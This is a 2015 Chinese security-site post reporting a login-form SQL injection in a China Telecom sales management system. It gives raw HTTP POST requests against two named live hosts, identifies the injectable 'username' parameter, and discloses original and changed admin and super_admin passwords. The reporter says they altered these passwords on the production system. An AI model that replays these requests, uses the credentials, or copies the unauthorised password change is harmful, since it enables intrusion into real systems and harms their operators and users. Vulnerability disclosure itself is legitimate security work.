您现在的位置: 华盟网 >> 漏洞 >> 网站漏洞 >> 正文

[组图]中国电信某系统登陆框SQL注入漏洞

2015/6/26 作者:彩儿 来源: 本站整理
导读 中国电信某系统登陆框SQL注入漏洞



  中国电信某系统登陆框SQL注入漏洞

  中国电信销售管家系统3.0版存在登录框SQL注入

  POST /install/login.php HTTP/1.1

  Content-Length: 209

  Content-Type: application/x-www-form-urlencoded

  X-Requested-With: XMLHttpRequest

  Referer: http://sdgree.grirms.com:80/

  Cookie: PHPSESSID=edq5psps1jo1fvo13cea7uku05; grirms_grirms_remember_me=ogfdiclb

  Host: sdgree.grirms.com

  Connection: Keep-alive

  Accept-Encoding: gzip,deflate

  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0

  Mobile/10A5376e Safari/8536.25

  Accept: */*

  auth_code=94102&password=admin&referer=&remember_me=on&username=admin

  参数:username

      
      
     

  登录时提示密码过期,需要更改密码,所以改了管理员的密码原密码:admin/sdgree1234567现密码:admin/Sdgree123原密码:super_admin/sdgree1111111现密码:super_admin/Sdgree123

  其他案例http://bx.grirms.com/

      
 

  POST /install/login.php HTTP/1.1

  Content-Length: 209

  Content-Type: application/x-www-form-urlencoded

  X-Requested-With: XMLHttpRequest

  Referer: http://bx.grirms.com:80/install/login.php

  Host: bx.grirms.com

  Connection: Keep-alive

  Accept-Encoding: gzip,deflate

  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0

  Mobile/10A5376e Safari/8536.25

  Accept: */*

  auth_code=94102&password=admin&referer=&remember_me=on&username=admin

                  微信群名称:华盟黑白之道二群     华盟-黑白之道⑦QQ群: 9430885

  • 上一篇漏洞:

  • 下一篇漏洞: 没有了
  • 网友评论
      验证码
     

    关注

    分享

    0

    讨论

    2

    猜你喜欢

    论坛最新贴